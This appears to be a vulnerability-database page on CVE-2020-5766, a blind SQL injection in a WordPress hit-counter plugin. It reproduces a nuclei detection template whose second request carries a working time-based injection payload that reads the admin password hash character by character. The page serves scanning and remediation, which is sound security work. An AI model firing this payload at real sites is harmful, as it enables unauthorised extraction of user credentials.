Lucene search
K

SRS Simple Hits Counter 1.0.3-1.0.4 - Unauthenticated Blind SQL Injection

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

High severity SQL injection in SRS Simple Hits Counter for WordPress allows remote data access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-5766
9 Jun 202510:26
circl
Check Point Advisories
SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465)
18 Nov 202000:00
checkpoint_advisories
CVE
CVE-2020-5766
13 Jul 202014:20
cve
Cvelist
CVE-2020-5766
13 Jul 202014:20
cvelist
Dsquare
WordPress SRS Simple Hits Counter SQL Injection
2 Sep 202000:00
dsquare
NVD
CVE-2020-5766
13 Jul 202015:15
nvd
OSV
CVE-2020-5766
13 Jul 202015:15
osv
Prion
Sql injection
13 Jul 202015:15
prion
Positive Technologies
PT-2020-18687 · WordPress · Srs Simple Hits Counter Plugin
13 Jul 202000:00
ptsecurity
RedhatCVE
CVE-2020-5766
22 May 202517:42
redhatcve
Rows per page
id: CVE-2020-5766

info:
  name: SRS Simple Hits Counter 1.0.3-1.0.4 - Unauthenticated Blind SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in SRS Simple Hits Counter Plugin for WordPress 1.0.3 and 1.0.4 allows a remote, unauthenticated attacker to determine the value of database fields.
  impact: |
    Unauthenticated attackers can extract database contents via blind SQL injection, potentially exposing sensitive WordPress user data and credentials.
  remediation: |
    Update to the latest version of SRS Simple Hits Counter plugin.
  reference:
    - https://github.com/tenable/poc/blob/master/WordPress/plugins/SRS_Simple_Hits_Counter/blind_sqli_tra_2020_42.py
    - https://www.tenable.com/security/research/tra-2020-42
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-5766
    cwe-id: CWE-89
    epss-score: 0.06052
    epss-percentile: 0.9251
    cpe: cpe:2.3:a:srs_simple_hits_counter_project:srs_simple_hits_counter:1.0.3:*:*:*:*:wordpress:*:*
  metadata:
    vendor: srs_simple_hits_counter_project
    product: srs_simple_hits_counter
    framework: wordpress
    publicwww-query: "/wp-content/plugins/srs-simple-hits-counter/"
  tags: cve,cve2020,srs-simple-hits-counter,wordpress,wp,wp-plugin,time-based-sqli,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/srs-simple-hits-counter")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /wp-admin/admin-ajax.php?action=srs_update_counter&post_id=1+and+1=0)+union+select+(select+if(ascii(substring((select+user_pass+from+wp_users+where+user_login=char(97,100,109,105,110)),%d,1))=%d,sleep(6),sleep(0))),1,1,1,1,1;-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
# digest: 490a00463044022076f5c355a84b6b43ca98a2ecc66e80a65da5924bbf8ca5c1c0c508382ae2aeec022023ee5f47310e9b528b3da3002f0f1ba3c2331de22f8800d47fb66586b01a26fc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.06052
19